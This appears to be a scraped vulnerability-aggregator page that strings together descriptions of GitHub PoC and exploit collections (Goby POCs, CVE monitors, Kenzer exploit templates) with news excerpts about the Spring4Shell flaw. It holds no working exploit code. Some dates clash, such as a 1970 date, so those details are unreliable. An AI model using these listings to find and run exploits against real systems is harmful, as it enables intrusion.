Goby_POC POC count 1319 Updated 2023/7/29 00:31:11 Goby POCs collected from the public internet, plus some POCs I added myself 360 TianQing ccid SQL injectable 360 TianQing database information disclosure 3ware default password vulnerability 74CMS Resumephp Boolean SQLI 74CMS SQLi with Plus ajax common 74CMS SQLi with Plus weixin AceNet AceReporter Report component Arbitrary file download ACME mini

TOP All bugbounty pentesting CVE-2023- POC Exp RCE example payload Things

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 202

Penetration-testing POCs, EXPs, scripts, privilege escalation, small utilities, etc.---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms

PoC in GitHub 2023 CVE-2023-0045 missyes/CVE-2023-0045 es0j/CVE-2023-0045 CVE-2023-0179 TurtleARM/CVE-2023-0179-PoC CVE-2023-0297 (2023-01-13) Code Injection in GitHub repository pyload/pyload prior to 050b3dev31 bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad CVE-2023-0315 (2023-01-15) Command Injection in GitHub repository froxlor/froxlor prior to 208 mhaskar/C

📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.

PoC in GitHub 2023 CVE-2023-0045 (2023-04-25) The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall The ib_prctl_set  function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bi

Github CVE Monitor Automatic monitor github cve using Github Actions Last generated : 2023-11-27 01:54:56409018 CVE Name Description Date CVE-2023-9999 obelia01/CVE-2023-9999 test 2023-08-21T12:02:45Z CVE-2023-5815 codeb0ss/CVE-2023-5815-PoC no description 2023-10-26T22:50:26Z CVE-2023-5601 codeb0ss/CVE-2023-5601-PoC no description 2023-10-19T00:47:06Z CVE-2023-

Github CVE Monitor Automatic monitor github cve using Github Actions Last generated : 2023-11-28 01:55:33286580 CVE Name Description Date CVE-2023-9999 obelia01/CVE-2023-9999 test 2023-08-21T12:02:45Z CVE-2023-5815 codeb0ss/CVE-2023-5815-PoC no description 2023-10-26T22:50:26Z CVE-2023-5601 codeb0ss/CVE-2023-5601-PoC no description 2023-10-19T00:47:06Z CVE-2023-

essential templates for kenzer [DEPRECATED]

Kenzer Templates [5170] [DEPRECATED] TEMPLATE TOOL FILE favinizer favinizer favinizeryaml CVE-2013-2251 freaker freaker/exploits/CVE-2013-2251/exploitsh CVE-2017-6360 freaker freaker/exploits/CVE-2017-6360/exploitsh CVE-2017-6361 freaker freaker/exploits/CVE-2017-6361/exploitsh CVE-2017-7921 freaker freaker/exploits/CVE-2017-7921/exploitsh CVE-2018-11784 f

test Reverse junk-data drop CVE-2022-23305 tools exploitation tutorial Exploit POC

CVE-2022-XXXX Reverse junk-data drop CVE subscription tools exploitation tutorial Exploit POC RCE LOG4j deserialization JNDI Payload CVE-2022-20550 CVE-2022-20551 CVE-2022-20552 CVE-2022-20553 CVE-2022-20554 CVE-2022-20555 CVE-2022-20556 CVE-2022-20557 CVE-2022-20558 CVE-2022-20559 CVE-2022-20560 CVE-2022-20561 CVE-2022-20562 CVE-2022-20563 CVE-2022-20564 CVE-2022-20565 CVE-2022-20566 CVE-2

Recent Articles

Spring4Shell: New Zero-day RCE Vulnerability Uncovered in Java Framework
Symantec Threat Intelligence Blog • Threat Hunter Team • 31 Mar 2023

Symantec products will protect against attempted exploits of Spring4Shell vulnerability.

Posted: 31 Mar, 2022. 3 Min Read. Threat Intelligence.
A zero-day vulnerability in the Spring Core Java framework that could allow for unauthenticated remote code execution (RCE) on vulnerable applications was publicly disclosed on March 30, before a patch wa...

Spring4Shell (CVE-2022-22965): details and mitigations
Securelist • AMR • 04 Apr 2022

Last week researchers found the critical vulnerability CVE-2022-22965 in Spring – the open source Java framework. Using the vulnerability, an attacker can execute arbitrary code on a remote web server, which makes CVE-2022-22965 a critical threat, given the Spring framework’s popularity. By analogy with the infamous Log4Shell threat, the vulnerability was named Spring4Shell.
CVE-2022-22965 and CVE-2022-22963: technical details
CVE-2022-22965 (Spring4Shell, SpringShell) is a vulne...

RCE Bug in Spring Cloud Could Be the Next Log4Shell, Researchers Warn
Threatpost • Tara Seals • 30 Mar 2022

NOTE: This post is about the confirmed and patched vulnerability tracked as CVE-2022-22963. While the researchers at Sysdig refer to this Spring Cloud bug as “Spring4Shell,” it should be noted that there is some confusion as to what to call it, with another security firm referring to a different, unconfirmed bug in Spring Core as “Spring4Shell.” To avoid confusion, this post has been amended to take out references to Spring4Shell altogether.
A concerning security vulnerability has ...

Patch now: RCE Spring4shell hits Java Spring framework
The Register • Richard Speed • 01 Jan 1970

You didn't have any plans for the weekend anyway, did you?

Another Java Remote Code Execution vulnerability has reared its head, this time in the popular Spring Framework and, goodness, it's a nasty one.
Dubbed "Springshell" or "Spring4Shell", the vulnerability requires an endpoint with DataBinder enabled. "For example," explained security shop Praetorian, "when Spring is deployed to Apache Tomcat, the WebAppClassLoader is accessible, which allows an attacker to call getters and setters to ultimately write a malicious JSP file to disk."
"Spr...